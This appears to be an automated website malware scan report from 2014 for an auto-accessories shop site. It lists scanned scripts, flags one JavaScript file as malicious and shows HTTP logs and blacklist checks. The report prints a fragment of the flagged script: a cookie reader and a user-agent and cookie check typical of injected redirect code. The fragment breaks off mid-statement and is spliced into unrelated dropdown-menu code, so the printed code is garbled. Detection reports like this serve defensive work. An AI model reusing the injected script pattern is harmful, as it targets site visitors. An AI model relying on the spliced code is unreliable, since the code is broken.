Scanned pages/files
Request | Server response | Status |
http://autoworldaccessories.com/ | 200 OK Content-Length: 62447 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
https://secure.dealerstore.net/include/ddaccordion.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://secure.dealerstore.net/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://s9.addthis.com/js/widget.php?v=10 | 200 OK Content-Length: 7647 Content-Type: text/plain | clean |
http://autoworldaccessories.com/include/newMMY.js | 200 OK Content-Length: 84929 Content-Type: application/x-javascript | clean |
http://autoworldaccessories.com/include/common.js | 200 OK Content-Length: 6894 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(name) {
    var matches = document.cookie.match(new RegExp(
        "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
    ));
    return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Replacecountermine() {
    var parover = navigator.userAgent;
    var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1);
    var ru = (getCookie("rightmools") === u with (Ctrl) {
                length=1;
                for (var intCtr=0; intCtr<=y[strModel][strMake].length -1 ;intCtr++) {
                    options[intCtr+1] = new Option(y[strModel][strMake][intCtr],y[strModel][strMake][intCtr]);
                    if (y[strModel][strMake][intCtr]==SelectedValue) {
                        selectedIndex=intCtr+1;
                    }
                }
            }
        } else {
            with (Ctrl) {
                length=1;
                selectedIndex=0;
            }
        }
    }
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: autoworldaccessories.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Cache-Control: no-cache
Date: Thu, 09 Oct 2014 22:36:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Length: 62447
Content-Type: text/html
Expires: Fri, 01 Jan 1999 05:00:00 GMT
Set-Cookie: IMGSessionID=A4D8B51648D0444E9740B46CE0AB3E0F; path=/
Set-Cookie: ASPSESSIONIDCQTRQRTT=NHPFKJGDGIHOBIHABAHFPPDD; path=/
X-Powered-By: ASP.NET
...62447 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: autoworldaccessories.com
Referer: http://www.google.com/search?q=autoworldaccessories.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=autoworldaccessories.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://autoworldaccessories.com/
Result: autoworldaccessories.com is not infected or malware details are not published yet.